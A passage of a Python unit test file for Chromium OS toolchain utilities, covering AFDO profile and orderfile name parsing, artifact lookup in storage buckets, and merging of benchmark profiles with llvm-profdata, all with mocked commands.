def testParseCWPProfileName(self):
"""Test top-level function _ParseCWPProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseCWPProfileName(profile_name_to_fail)
self.assertIn('Unparseable CWP profile name:', str(context.exception))
# Test parse success
profile_name = 'R77-3809.38-1562580965.afdo.xz'
result = toolchain_util._ParseCWPProfileName(profile_name)
self.assertEqual(
result,
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965))
def testParseMergedProfileName(self):
"""Test top-level function _ParseMergedProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseMergedProfileName(profile_name_to_fail)
self.assertIn('Unparseable merged AFDO name:', str(context.exception))
# Test parse orderfile success
orderfile_name = ('chromeos-chrome-orderfile-field-77-3809.38-1562580965'
'-benchmark-77.0.3849.0-r1.orderfile.xz')
result = toolchain_util._ParseMergedProfileName(orderfile_name)
self.assertEqual(
result, (toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False),
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965)))
# Test parse release AFDO success
afdo_name = ('chromeos-chrome-amd64-airmont-77-3809.38-1562580965'
'-benchmark-77.0.3849.0-r1-redacted.afdo.xz')
result = toolchain_util._ParseMergedProfileName(afdo_name)
self.assertEqual(
result, (toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False),
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965)))
def testGetArtifactVersionInEbuild(self):
"""Test top-level function _GetArtifactVersionInEbuild."""
package = 'package'
ebuild_file = os.path.join(self.tempdir, 'package.ebuild')
variables = ['variable_name', 'another_variable_name']
values = ['old-afdo-artifact-1.0', 'another-old-afdo-artifact-1.0']
ebuild_file_content = '\n'.join([
'Some message before',
'%s="%s"' % (variables[0], values[0]),
'%s="%s"' % (variables[1], values[1]), 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
self.PatchObject(
toolchain_util, '_FindEbuildPath', return_value=ebuild_file)
for n, v in zip(variables, values):
ret = toolchain_util._GetArtifactVersionInEbuild(package, n)
self.assertEqual(ret, v)
def testGetOrderfileName(self):
"""Test method _GetOrderfileName and related methods."""
profile_name = ('chromeos-chrome-amd64-silvermont-77-3809.38-1562580965-'
'benchmark-77.0.3849.0-r1-redacted.afdo.xz')
self.PatchObject(
toolchain_util,
'_GetArtifactVersionInChromium',
return_value=profile_name)
result = toolchain_util._GetOrderfileName('/path/to/chrome_root')
cwp_name = 'field-77-3809.38-1562580965'
benchmark_name = 'benchmark-77.0.3849.0-r1'
self.assertEqual(
result, 'chromeos-chrome-orderfile-%s-%s' % (cwp_name, benchmark_name))
def testCompressAFDOFiles(self):
"""Test _CompressAFDOFiles()."""
input_dir = '/path/to/inputs'
output_dir = '/another/path/to/outputs'
targets = ['input1', '/path/to/inputs/input2']
suffix = '.xz'
self.PatchObject(cros_build_lib, 'CompressFile')
# Should raise exception because the input doesn't exist
with self.assertRaises(RuntimeError) as context:
toolchain_util._CompressAFDOFiles(targets, input_dir, output_dir, suffix)
self.assertEqual(
str(context.exception), 'file %s to compress does not exist' %
os.path.join(input_dir, targets[0]))
# Should pass
self.PatchObject(os.path, 'exists', return_value=True)
toolchain_util._CompressAFDOFiles(targets, input_dir, output_dir, suffix)
compressed_names = [os.path.basename(x) for x in targets]
inputs = [os.path.join(input_dir, n) for n in compressed_names]
outputs = [os.path.join(output_dir, n + suffix) for n in compressed_names]
calls = [mock.call(n, o) for n, o in zip(inputs, outputs)]
cros_build_lib.CompressFile.assert_has_calls(calls)
def testGetProfileAge(self):
"""Test top-level function _GetProfileAge()."""
# Test unsupported artifact_type
current_day_profile = 'R0-0.0-%d' % int(time.time())
with self.assertRaises(ValueError) as context:
toolchain_util._GetProfileAge(current_day_profile, 'unsupported_type')
self.assertEqual('Only kernel afdo is supported to check profile age.',
str(context.exception))
# Test using profile of the current day.
ret = toolchain_util._GetProfileAge(current_day_profile, 'kernel_afdo')
self.assertEqual(0, ret)
# Test using profile from the last day.
last_day_profile = 'R0-0.0-%d' % int(time.time() - 86400)
ret = toolchain_util._GetProfileAge(last_day_profile, 'kernel_afdo')
self.assertEqual(1, ret)
class PrepareBundleTest(cros_test_lib.RunCommandTempDirTestCase):
"""Setup code common to Prepare/Bundle class methods."""
def setUp(self):
self.board = 'lulu'
self.chroot = chroot_lib.Chroot(path=self.tempdir, chrome_root=self.tempdir)
self.sysroot = '/build/%s' % self.board
self.chrome_package = 'chromeos-chrome'
self.kernel_package = 'chromeos-kernel-3_14'
self.chrome_PV = 'chromeos-base/chromeos-chrome-78.0.3893.0-r1'
self.chrome_ebuild = os.path.realpath(
os.path.join(
os.path.dirname(__file__), '..', '..',
'src', 'third_party', 'chromiumos-overlay',
os.path.dirname(self.chrome_PV), 'chromeos-chrome',
'%s.ebuild' % os.path.basename(self.chrome_PV)))
self.chrome_CPV = portage_util.SplitCPV(self.chrome_PV)
self.glob = self.PatchObject(
glob, 'glob', return_value=[self.chrome_ebuild])
self.rc.AddCmdResult(partial_mock.In('rm'), returncode=0)
self.obj = toolchain_util._CommonPrepareBundle('None')
self.gs_context = self.PatchObject(self.obj, '_gs_context')
self.gsc_list = self.PatchObject(self.gs_context, 'List', return_value=[])
self.data = b'data'
self.arch = 'silvermont'
self.fetch = self.PatchObject(
gob_util, 'FetchUrl', return_value=base64.encodebytes(self.data))
class CommonPrepareBundleTest(PrepareBundleTest):
"""Test common Prepare/Bundle class methods."""
def testGetEbuildInfo(self):
"""Verify that EbuildInfo is correctly returned."""
# chrome_branch calls GetEbuildInfo.
self.assertEqual('78', self.obj.chrome_branch)
self.glob.assert_called_once()
self.glob.return_value = ['1', '2']
self.assertRaises(toolchain_util.PrepareForBuildHandlerError,
self.obj._GetEbuildInfo, 'chromeos-kernel-3_14')
def test_GetArtifactVersionInGob(self):
"""Test that we look in the right place in GoB."""
self.assertRaises(ValueError, self.obj._GetArtifactVersionInGob, 'badarch')
self.assertEqual(
self.data.decode('utf-8'), self.obj._GetArtifactVersionInGob(self.arch))
self.fetch.assert_called_once_with(
constants.EXTERNAL_GOB_HOST,
'chromium/src/+/refs/tags/%s/chromeos/profiles/%s.afdo.newest.txt'
'?format=text' % (self.chrome_CPV.version_no_rev, self.arch))
self.fetch.reset_mock()
self.fetch.return_value = ''
self.assertRaises(RuntimeError, self.obj._GetArtifactVersionInGob,
self.arch)
self.fetch.assert_called_once()
def test_GetOrderfileName(self):
"""Test that GetOrderfileName finds the right answer."""
vers = self.PatchObject(
self.obj,
'_GetArtifactVersionInGob',
return_value=('chromeos-chrome-amd64-silvermont-78-1111.0-'
'157000000-benchmark-78.0.3893.0-r1-redacted.afdo.xz'))
self.assertEqual(
'chromeos-chrome-orderfile-field-78-1111.0-'
'157000000-benchmark-78.0.3893.0-r1.orderfile',
self.obj._GetOrderfileName())
vers.assert_called_once()
def test_UpdateEbuildWithArtifacts(self):
"""Test _UpdateEbuildWithArtifacts."""
func = self.PatchObject(self.obj, '_PatchEbuild')
self.obj._UpdateEbuildWithArtifacts('chromeos-chrome', {'var': 'val'})
info = toolchain_util._EbuildInfo(
path=self.chrome_ebuild, CPV=self.chrome_CPV)
info_9999 = toolchain_util._EbuildInfo(
path=os.path.realpath(
os.path.join(
os.path.dirname(__file__), '..', '..', 'src', 'third_party',
'chromiumos-overlay', 'chromeos-base', 'chromeos-chrome',
'chromeos-chrome-9999.ebuild')),
CPV=portage_util.SplitCPV('chromeos-base/chromeos-chrome-9999'))
self.assertEqual([
mock.call(info, {'var': 'val'}, uprev=True),
mock.call(info_9999, {'var': 'val'}, uprev=False)
], func.call_args_list)
class PrepBundLatestAFDOArtifactTest(PrepareBundleTest):
"""Test related function to compare freshness of AFDO artifacts."""
def setUp(self):
self.board = 'board'
self.gs_url = 'gs://path/to/any_gs_url'
self.current_branch = '78'
self.current_arch = 'airmont'
self.MockListResult = collections.namedtuple('MockListResult',
('url', 'creation_time'))
files_in_gs_bucket = [
# Benchmark profiles
('chromeos-chrome-amd64-78.0.3893.0_rc-r1.afdo.bz2', 2.0),
('chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2', 1.0), # Latest
('chromeos-chrome-amd64-78.0.3897.0_rc-r1-merged.afdo.bz2', 3.0),
# CWP profiles
('R78-3869.38-1562580965.afdo.xz', 2.1),
('R78-3866.0-1570000000.afdo.xz', 1.1), # Latest
('R77-3811.0-1580000000.afdo.xz', 3.1),
# Kernel profiles
('R76-3869.38-1562580965.gcov.xz', 1.3),
('R76-3866.0-1570000000.gcov.xz', 2.3), # Latest
# Orderfiles
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz', 1.2), # Latest
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3850.0-r1.orderfile.xz', 2.2),
]
self.gs_list = [
self.MockListResult(url=os.path.join(self.gs_url, x), creation_time=y)
for x, y in files_in_gs_bucket
]
self.gsc_list.return_value = self.gs_list
def testFindLatestAFDOArtifactPassWithBenchmarkAFDO(self):
"""Test _FindLatestAFDOArtifact returns latest benchmark AFDO."""
latest_afdo = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidBenchmarkProfiles)
self.assertEqual(
latest_afdo,
os.path.join(self.gs_url,
'chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2'))
def testFindLatestAFDOArtifactPassWithOrderfile(self):
"""Test _FindLatestAFDOArtifact return latest orderfile."""
latest_orderfile = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
os.path.join(
self.gs_url, 'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz'))
def testFindLatestAfdoArtifactOnPriorBranch(self):
"""Test that we find a file from prior branch when we have none."""
self.obj._ebuild_info['chromeos-chrome'] = toolchain_util._EbuildInfo(
path='path',
CPV=portage_util.SplitCPV(
'chromeos-base/chromeos-chrome-79.0.3900.0-r1'))
latest_orderfile = self.obj._FindLatestAFDOArtifact(
[self.gs_url], self.obj._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
os.path.join(
self.gs_url, 'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz'))
def testFindLatestAFDOArtifactFailToFindAnyFiles(self):
"""Test function fails when no files on current branch."""
self.obj._ebuild_info['chromeos-chrome'] = toolchain_util._EbuildInfo(
path='path',
CPV=portage_util.SplitCPV(
'chromeos-base/chromeos-chrome-80.0.3950.0-r1'))
self.gsc_list.side_effect = gs.GSNoSuchKey('No files')
with self.assertRaises(RuntimeError) as context:
self.obj._FindLatestAFDOArtifact([self.gs_url],
self.obj._RankValidOrderfiles)
self.assertEqual('No files for branch 80 found in %s' % self.gs_url,
str(context.exception))
def testFindLatestAFDOArtifactsFindMaxFromInvalidFiles(self):
"""Test function fails when searching max from list of invalid files."""
mock_gs_list = [
self.MockListResult(
url=os.path.join(self.gs_url, 'Invalid-name-but-end-in-78.afdo'),
creation_time=1.0)
]
self.gsc_list.return_value = mock_gs_list
with self.assertRaises(RuntimeError) as context:
self.obj._FindLatestAFDOArtifact([self.gs_url],
self.obj._RankValidBenchmarkProfiles)
self.assertIn('No valid latest artifact was found', str(context.exception))
class PrepareForBuildHandlerTest(PrepareBundleTest):
"""Test PrepareForBuildHandler specific methods."""
def setUp(self):
self.artifact_type = 'Unspecified'
self.input_artifacts = {}
self.profile_info = {}
self.gsc_exists = None
self.orderfile_name = (
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile')
self.afdo_name = 'chromeos-chrome-amd64-78.0.3893.0-r1.afdo'
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_GetOrderfileName',
return_value=self.orderfile_name)
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_FindLatestOrderfileArtifact',
return_value=self.orderfile_name + toolchain_util.XZ_COMPRESSION_SUFFIX)
self.patch_ebuild = self.PatchObject(toolchain_util._CommonPrepareBundle,
'_PatchEbuild')
def SetUpPrepare(self, artifact_type, input_artifacts):
"""Set up to test _Prepare${artifactType}."""
self.artifact_type = artifact_type
self.input_artifacts = input_artifacts
self.obj = toolchain_util.PrepareForBuildHandler(self.artifact_type,
self.chroot, self.sysroot,
self.board,
self.input_artifacts,
self.profile_info)
self.obj._gs_context = self.gs_context
self.PatchObject(self.obj, '_GetOrderfileName', return_value='orderfile')
self.gsc_exists = self.PatchObject(
self.gs_context, 'Exists', return_value=True)
def testPrepareUnverifiedChromeLlvmOrderfileExists(self):
"""Test that PrepareUnverfiedChromeLlvmOrderfile works when POINTLESS."""
self.SetUpPrepare(
'UnverifiedChromeLlvmOrderfile',
{'UnverifiedChromeLlvmOrderfile': ['gs://publish/location']})
self.assertEqual(toolchain_util.PrepareForBuildReturn.POINTLESS,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with(
'gs://publish/location/orderfile.xz')
def testPrepareUnverifiedChromeLlvmOrderfileMissing(self):
"""Test that PrepareUnverfiedChromeLlvmOrderfile works when NEEDED."""
self.SetUpPrepare(
'UnverifiedChromeLlvmOrderfile',
{'UnverifiedChromeLlvmOrderfile': ['gs://publish/location']})
self.gsc_exists.return_value = False
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with(
'gs://publish/location/orderfile.xz')
def testPrepareVerifiedChromeLlvmOrderfileExists(self):
"""Test that PrepareVerfiedChromeLlvmOrderfile works when POINTLESS."""
self.SetUpPrepare(
'VerifiedChromeLlvmOrderfile', {
'UnverifiedChromeLlvmOrderfile':
['gs://path/to/unvetted', 'gs://other/path/to/unvetted']
})
self.assertEqual(toolchain_util.PrepareForBuildReturn.POINTLESS,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with('gs://path/to/vetted/%s.xz' %
self.orderfile_name)
# The ebuild is still updated.
self.patch_ebuild.assert_called_once()
def testPrepareVerifiedChromeLlvmOrderfileMissing(self):
"""Test that PrepareVerfiedChromeLlvmOrderfile works when NEEDED."""
self.SetUpPrepare(
'VerifiedChromeLlvmOrderfile', {
'UnverifiedChromeLlvmOrderfile':
['gs://path/to/unvetted', 'gs://other/path/to/unvetted']
})
self.gsc_exists.return_value = False
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
self.gs_context.Exists.assert_called_once_with('gs://path/to/vetted/%s.xz' %
self.orderfile_name)
self.patch_ebuild.assert_called_once()
def testPrepareUnverifiedChromeBenchmarkAfdoFile(self):
self.SetUpPrepare(
'UnverifiedChromeBenchmarkAfdoFile', {
'UnverifiedChromeBenchmarkPerfFile': ['gs://path/to/perfdata'],
'UnverifiedChromeBenchmarkAfdoFile': ['gs://path/to/unvetted'],
'ChromeDebugBinary': ['gs://image-archive/path'],
})
# Published artifact is missing, debug binary is present, perf.data is
# missing.
self.gsc_exists.side_effect = (False, True, False)
self.assertEqual(toolchain_util.PrepareForBuildReturn.NEEDED,
self.obj.Prepare())
expected = [
mock.call('gs://path/to/unvetted/'
'chromeos-chrome-amd64-78.0.3893.0-r1.afdo.bz2'),
mock.call('gs://image-archive/path/chrome.debug.bz2'),
mock.call('gs://path/to/perfdata/'
'chromeos-chrome-amd64-78.0.3893.0.perf.data.bz2'),
]
self.assertEqual(expected, self.gs_context.Exists.call_args_list)
# There is no need to patch the ebuild.
self.patch_ebuild.assert_not_called()
class BundleArtifactHandlerTest(PrepareBundleTest):
"""Test BundleArtifactHandler specific methods."""
def setUp(self):
def _Bundle(_self):
osutils.WriteFile(os.path.join(_self.output_dir, 'artifact'), 'data\n')
self.artifact_type = 'Unspecified'
self.outdir = None
self.profile_info = {}
self.orderfile_name = (
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile')
self.gen_order = self.PatchObject(
toolchain_util.GenerateChromeOrderfile, 'Bundle', new=_Bundle)
self.PatchObject(
toolchain_util._CommonPrepareBundle,
'_GetArtifactVersionInEbuild',
return_value=self.orderfile_name)
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self.copy2 = self.PatchObject(shutil, 'copy2')
def SetUpBundle(self, artifact_type):
"""Set up to test _Bundle${artifactType}."""
self.artifact_type = artifact_type
self.outdir = os.path.join(self.tempdir, 'tmp', 'output_dir')
osutils.SafeMakedirs(self.outdir)
self.obj = toolchain_util.BundleArtifactHandler(self.artifact_type,
self.chroot, self.sysroot,
self.board, self.outdir,
self.profile_info)
self.obj._gs_context = self.gs_context
def testBundleUnverifiedChromeLlvmOrderfile(self):
"""Test that BundleUnverfiedChromeLlvmOrderfile works."""
self.SetUpBundle('UnverifiedChromeLlvmOrderfile')
artifact = os.path.join(self.outdir, 'artifact')
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(mock.ANY, artifact)
def testBundleVerifiedChromeLlvmOrderfileExists(self):
"""Test that BundleVerfiedChromeLlvmOrderfile works."""
self.SetUpBundle('VerifiedChromeLlvmOrderfile')
artifact = os.path.join(self.outdir, '%s.xz' % self.orderfile_name)
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(
os.path.join(self.chroot.path, 'build', self.board, 'opt/google/chrome',
'%s.xz' % self.orderfile_name), artifact)
def testBundleChromeClangWarningsFile(self):
"""Test that BundleChromeClangWarningsFile works."""
class mock_datetime(object):
"""Class for mocking datetime.datetime."""
@staticmethod
def strftime(_when, _fmt):
return 'DATE'
@staticmethod
def now():
return -1
self.PatchObject(datetime, 'datetime', new=mock_datetime)
self.SetUpBundle('ChromeClangWarningsFile')
artifact = os.path.join(self.outdir,
'%s.DATE.clang_tidy_warnings.tar.xz' % self.board)
self.assertEqual([artifact], self.obj.Bundle())
self.copy2.assert_called_once_with(mock.ANY, artifact)
def testBundleUnverifiedLlvmPgoFile(self):
self.SetUpBundle('UnverifiedLlvmPgoFile')
llvm_version = '10.0_pre377782_p20200113-r14'
llvm_clang_sha = 'a21beccea2020f950845cbb68db663d0737e174c'
llvm_cpv = portage_util.SplitCPV('sys-devel/llvm-%s' % llvm_version)
self.PatchObject(
self.obj,
'_GetProfileNames',
return_value=[
self.chroot.full_path(self.sysroot, 'build', 'coverage_data',
'sys-libs', 'libcxxabi', 'raw_profiles',
'libcxxabi-10.0_pre3_1673101222_0.profraw')
])
self.PatchObject(
portage_util, 'FindPackageNameMatches', return_value=[llvm_cpv])
self.rc.AddCmdResult(
partial_mock.In('clang'),
returncode=0,
stdout=('Chromium OS %s clang version 10.0.0 (/path/to/'
'llvm-project %s)\n' % (llvm_version, llvm_clang_sha)))
base = '%s-%s' % (llvm_cpv.pv, llvm_clang_sha)
artifacts = [
os.path.join(self.outdir, x)
for x in ('%s.llvm_metadata.json' % base, 'llvm_metadata.json',
'%s.llvm.profdata.tar.xz' % base)
]
self.assertEqual(artifacts, self.obj.Bundle())
def testBundleUnverifiedChromeBenchmarkPerfFile(self):
self.SetUpBundle('UnverifiedChromeBenchmarkPerfFile')
self.assertEqual([], self.obj.Bundle())
def testBundleChromeDebugBinary(self):
self.SetUpBundle('ChromeDebugBinary')
bin_path = toolchain_util._CHROME_DEBUG_BIN % {
'root': self.chroot.path,
'sysroot': self.sysroot
}
osutils.WriteFile(bin_path, '', makedirs=True)
output = os.path.join(
self.outdir,
os.path.basename(bin_path) + toolchain_util.BZ2_COMPRESSION_SUFFIX)
self.assertEqual([output], self.obj.Bundle())
class CreateAndUploadMergedAFDOProfileTest(PrepBundLatestAFDOArtifactTest):
"""Test CreateAndUploadMergedAFDOProfile and related functions.
These tests are mostly coming from cbuildbot/afdo_unittest.py, and are
written to adapt to recipe functions. When legacy builders are removed,
those tests can be safely preserved by this one.
"""
@staticmethod
def _benchmark_afdo_profile_name(major=0,
minor=0,
build=0,
patch=0,
rev=1,
merged_suffix=False,
compression_suffix=True):
suffix = '-merged' if merged_suffix else ''
result = 'chromeos-chrome-amd64-%d.%d.%d.%d_rc-r%d%s' % (
major, minor, build, patch, rev, suffix)
result += toolchain_util.AFDO_SUFFIX
if compression_suffix:
result += toolchain_util.BZ2_COMPRESSION_SUFFIX
return result
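  # Worked example (hedged reading of the format string above, assuming
  # AFDO_SUFFIX == '.afdo' and BZ2_COMPRESSION_SUFFIX == '.bz2'):
  #   _benchmark_afdo_profile_name(major=78, build=3893)
  #   -> 'chromeos-chrome-amd64-78.0.3893.0_rc-r1.afdo.bz2'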
def setUp(self):
self.benchmark_url = 'gs://path/to/unvetted'
self.obj.input_artifacts = {
'UnverifiedChromeBenchmarkAfdoFile': [self.benchmark_url],
}
self.obj.chroot = self.chroot
self.output_dir = os.path.join(self.chroot.path, 'tmp', 'output_dir')
osutils.SafeMakedirs(self.output_dir)
self.output_dir_inchroot = self.chroot.chroot_path(self.output_dir)
self.now = datetime.datetime.now()
def runCreateAndUploadMergedAFDOProfileOnce(self, **kwargs):
if 'unmerged_name' not in kwargs:
# Match everything.
kwargs['unmerged_name'] = self._benchmark_afdo_profile_name(
major=9999, compression_suffix=False)
if 'output_dir' not in kwargs:
kwargs['output_dir'] = self.output_dir
Mocks = collections.namedtuple('Mocks', [
'gs_context',
'find_artifact',
'run_command',
'uncompress_file',
'compress_file',
'process_afdo_profile',
])
def MockList(*_args, **_kwargs):
files = [
self._benchmark_afdo_profile_name(major=10, build=9),
self._benchmark_afdo_profile_name(major=10, build=10),
self._benchmark_afdo_profile_name(
major=10, build=10, merged_suffix=True),
self._benchmark_afdo_profile_name(major=10, build=11),
self._benchmark_afdo_profile_name(major=10, build=12),
self._benchmark_afdo_profile_name(major=10, build=13),
self._benchmark_afdo_profile_name(
major=10, build=13, merged_suffix=True),
self._benchmark_afdo_profile_name(major=10, build=13, patch=1),
self._benchmark_afdo_profile_name(major=10, build=13, patch=2),
self._benchmark_afdo_profile_name(
major=10, build=13, patch=2, merged_suffix=True),
self._benchmark_afdo_profile_name(major=11, build=14),
self._benchmark_afdo_profile_name(
major=11, build=14, merged_suffix=True),
self._benchmark_afdo_profile_name(major=11, build=15),
]
results = []
for i, name in enumerate(files):
url = os.path.join(self.benchmark_url, name)
now = self.now - datetime.timedelta(days=len(files) - i)
results.append(self.MockListResult(url=url, creation_time=now))
return results
self.gs_context.List = MockList
run_command = self.PatchObject(cros_build_lib, 'run')
uncompress_file = self.PatchObject(cros_build_lib, 'UncompressFile')
compress_file = self.PatchObject(cros_build_lib, 'CompressFile')
process_afdo_profile = self.PatchObject(self.obj, '_ProcessAFDOProfile')
unmerged_profile = os.path.join(self.output_dir,
kwargs.pop('unmerged_name'))
osutils.Touch(unmerged_profile)
kwargs['unmerged_profile'] = unmerged_profile
merged_name = self.obj._CreateAndUploadMergedAFDOProfile(**kwargs)
return merged_name, Mocks(
gs_context=self.gs_context,
find_artifact=MockList,
run_command=run_command,
uncompress_file=uncompress_file,
compress_file=compress_file,
process_afdo_profile=process_afdo_profile,
)
def testCreateAndUploadMergedAFDOProfileErrorWhenProfileInBucket(self):
unmerged_name = self._benchmark_afdo_profile_name(major=10, build=13)
merged_name = None
with self.assertRaises(AssertionError):
merged_name, _ = self.runCreateAndUploadMergedAFDOProfileOnce(
unmerged_name=unmerged_name)
self.assertIsNone(merged_name)
def testCreateAndUploadMergedAFDOProfileMergesBranchProfiles(self):
unmerged_name = self._benchmark_afdo_profile_name(
major=10, build=13, patch=99, compression_suffix=False)
merged_name, mocks = self.runCreateAndUploadMergedAFDOProfileOnce(
unmerged_name=unmerged_name)
self.assertIsNotNone(merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
expected_unordered_args = [
'-output=' + os.path.join(
self.output_dir_inchroot, 'raw-' +
_afdo_name(major=10, build=13, patch=99, merged_suffix=True))
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, s)
for s in [
_afdo_name(major=10, build=12),
_afdo_name(major=10, build=13),
_afdo_name(major=10, build=13, patch=1),
_afdo_name(major=10, build=13, patch=2),
_afdo_name(major=10, build=13, patch=99),
]
]
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 4)
def testCreateAndUploadMergedAFDOProfileRemovesIndirectCallTargets(self):
unmerged_name = self._benchmark_afdo_profile_name(
major=10, build=13, patch=99, compression_suffix=False)
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(
recent_to_merge=2,
unmerged_name=unmerged_name)
self.assertIsNotNone(merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
merge_output_name = 'raw-' + _afdo_name(
major=10, build=13, patch=99, merged_suffix=True)
self.assertNotEqual(merged_name, merge_output_name)
expected_unordered_args = [
'-output=' + os.path.join(self.output_dir_inchroot, merge_output_name),
'-weighted-input=1,' + os.path.join(
self.output_dir_inchroot, _afdo_name(major=10, build=13, patch=2)),
'-weighted-input=1,' + os.path.join(
self.output_dir_inchroot, _afdo_name(major=10, build=13, patch=99)),
]
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
mocks.process_afdo_profile.assert_called_once_with(
os.path.join(self.output_dir, merge_output_name),
os.path.join(self.output_dir, merged_name),
redact=False,
remove=True,
compbinary=False,
)
def testCreateAndUploadMergedAFDOProfileWorksInTheHappyCase(self):
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce()
self.assertIsNotNone(merged_name)
# Note that we always return the *basename*
self.assertEqual(
merged_name,
self._benchmark_afdo_profile_name(
major=9999, merged_suffix=True, compression_suffix=False))
mocks.run_command.assert_called_once()
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
def _afdo_name(major, build=0, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
input_afdo_names = [
_afdo_name(major=10, build=13, patch=1),
_afdo_name(major=10, build=13, patch=2),
_afdo_name(major=11, build=14),
_afdo_name(major=11, build=15),
_afdo_name(major=9999),
]
output_afdo_name = _afdo_name(major=9999, merged_suffix=True)
expected_unordered_args = [
'-output=' +
os.path.join(self.output_dir_inchroot, 'raw-' + output_afdo_name)
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, n)
for n in input_afdo_names
]
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 4)
self.assertEqual(mocks.uncompress_file.call_count, 4)
def call_for(name):
basis = os.path.join(self.output_dir, name)
return mock.call(basis + toolchain_util.BZ2_COMPRESSION_SUFFIX, basis)
# The last profile is not compressed, so no need to uncompress it
mocks.uncompress_file.assert_has_calls(
any_order=True, calls=[call_for(n) for n in input_afdo_names[:-1]])
def testMergeIsOKIfWeFindFewerProfilesThanWeWant(self):
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(recent_to_merge=1000,
max_age_days=1000)
self.assertIsNotNone(merged_name)
self.assertEqual(mocks.gs_context.Copy.call_count, 9)
def testNoFilesAfterUnmergedNameAreIncluded(self):
max_name = self._benchmark_afdo_profile_name(
major=10, build=11, patch=2, compression_suffix=False)
merged_name, mocks = \
self.runCreateAndUploadMergedAFDOProfileOnce(unmerged_name=max_name)
self.assertIsNotNone(merged_name)
self.assertEqual(
self._benchmark_afdo_profile_name(
major=10,
build=11,
patch=2,
merged_suffix=True,
compression_suffix=False), merged_name)
def _afdo_name(major, build, patch=0, merged_suffix=False):
return self._benchmark_afdo_profile_name(
major=major,
build=build,
patch=patch,
merged_suffix=merged_suffix,
compression_suffix=False)
# Note that these should all be in-chroot names.
expected_ordered_args = ['llvm-profdata', 'merge', '-sample']
expected_unordered_args = [
'-output=' + os.path.join(
self.output_dir_inchroot, 'raw-' +
_afdo_name(major=10, build=11, patch=2, merged_suffix=True)),
] + [
'-weighted-input=1,' + os.path.join(self.output_dir_inchroot, s)
for s in [
_afdo_name(major=10, build=9),
_afdo_name(major=10, build=10),
_afdo_name(major=10, build=11),
_afdo_name(major=10, build=11, patch=2),
]
]
args = mocks.run_command.call_args[0][0]
ordered_args = args[:len(expected_ordered_args)]
self.assertEqual(ordered_args, expected_ordered_args)
unordered_args = args[len(expected_ordered_args):]
self.assertCountEqual(unordered_args, expected_unordered_args)
self.assertEqual(mocks.gs_context.Copy.call_count, 3)
self.assertEqual(mocks.uncompress_file.call_count, 3)
def testMergeDoesntHappenIfNoProfilesAreMerged(self):
runs = [
